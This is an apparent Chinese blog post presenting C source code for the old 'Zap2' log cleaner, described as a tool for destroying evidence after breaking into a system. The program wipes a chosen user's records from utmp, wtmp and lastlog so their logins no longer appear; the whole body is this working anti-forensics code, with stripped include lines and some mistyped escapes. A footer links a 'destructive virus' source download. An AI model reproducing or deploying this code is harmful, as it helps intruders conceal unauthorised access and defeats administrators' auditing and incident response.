破坏入侵系统后现场的源码

编辑 /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog.

请使用专门的编辑器

例子:


#include
#include
#include
#include
#include
#include
#include
#include
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"


int f;


void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;

 

if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}

 

void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;

 

pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {

 

while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}

 

void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;

 

if ((pwd=getpwnam(who))!=NULL) {

 

if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}

 

} else printf("%s: ?/n",who);
}

 

main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!/n");
} else
printf("Error./n");
}

阅读更多
文章标签: struct kill null
上一篇如何检测和隔离内存泄漏
下一篇网桥原理及源代码详解
想对作者说点什么? 我来说一句

易语言无敌破坏病毒源码

2014年09月20日 17KB 下载

没有更多推荐了,返回首页

关闭
关闭